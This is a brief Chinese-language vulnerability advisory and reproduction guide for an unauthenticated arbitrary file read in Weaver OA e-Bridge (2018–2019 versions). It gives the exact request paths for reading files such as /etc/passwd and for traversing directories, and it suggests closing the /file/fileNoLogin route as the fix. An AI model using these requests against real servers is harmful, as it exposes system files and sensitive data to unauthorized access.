泛微OA雲橋未授權任意檔案讀取
一、漏洞描述
泛微雲橋(e-Bridge)是上海泛微公司在”網際網路+”的背景下研發的一款用于橋接網際網路開放資源與企業資訊化系統的系統內建中間件。泛微雲橋存在任意檔案讀取漏洞,攻擊者成功利用該漏洞,可實作任意檔案讀取,擷取敏感資訊。
二、漏洞影響版本
2018-2019 多個版本。
三、漏洞複現
第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在傳回包有id字元串
第二步:通過id值擷取檔案内容(/file/fileNoLogin/id)
1、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,發現傳回提示不存在檔案或目錄,通過linux對大小寫敏感,判斷目标使用了linux系統
2、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt,發現傳回包中帶有id
3、通過檢視檔案接口通路 /file/fileNoLogin/id
4、downloadUrl參數填寫目錄的絕對路徑時,可以造成目錄周遊
四、漏洞修複建議
關閉程式路由 /file/fileNoLogin